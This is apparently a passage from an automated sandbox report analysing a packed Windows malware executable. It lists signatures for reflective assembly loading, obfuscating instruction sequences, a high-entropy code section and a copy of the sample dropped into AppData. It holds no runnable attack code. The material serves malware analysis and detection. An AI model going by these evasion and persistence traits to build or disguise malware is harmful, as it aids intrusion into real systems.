          Source: 0.2.pZTgBSxb0oe9deC.exe.990000.0.unpack, yy?P????c/f?gs?YxpLe.cs.Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.pZTgBSxb0oe9deC.exe.890000.0.unpack, yy?P????c/f?gs?YxpLe.cs.Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.pZTgBSxb0oe9deC.exe.890000.1.unpack, yy?P????c/f?gs?YxpLe.cs.Net Code: q?ODjieyv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382AF9 push edi; ret 0_2_01382AFA
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382FF0 push eax; ret 0_2_01382FF2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_0138286D push edi; ret 0_2_0138286E
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382AED push edi; ret 0_2_01382AEE
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382964 push edi; ret 0_2_0138298E
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382725 push edi; ret 0_2_01382742
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382BD4 push eax; ret 0_2_01382BD6
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382F54 push eax; ret 0_2_01382F56
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382915 push eax; ret 0_2_01382916
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_01382908 push ecx; ret 0_2_0138290A
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D64571 push cs; iretd 0_2_02D64572
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 0_2_02D62D20 pushad ; iretd 0_2_02D62D21
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0040A96D push ss; retf 5_2_0040A96E
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00416AC0 push esp; ret 5_2_00416B05
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_004163E2 pushfd ; iretd 5_2_004164AB
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041644F pushfd ; iretd 5_2_004164AB
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041E539 pushfd ; ret 5_2_0041E53F
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041CE52 push eax; ret 5_2_0041CE58
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_00416658 push ecx; iretd 5_2_00416680
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041CE5B push eax; ret 5_2_0041CEC2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041CE05 push eax; ret 5_2_0041CE58
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_004166B9 push ecx; iretd 5_2_00416680
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041CEBC push eax; ret 5_2_0041CEC2
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_0041B751 push ebx; retf 5_2_0041B752
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeCode function: 5_2_014DD0D1 push ecx; ret 5_2_014DD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85123600279
          Source: initial sampleStatic PE information: section name: .text entropy: 7.85123600279
          Source: C:\Users\user\Desktop\pZTgBSxb0oe9deC.exeFile created: C:\Users\user\AppData\Roaming\pRVJhcAjvJZLI.exeJump to dropped file

          Boot Survival:

          bar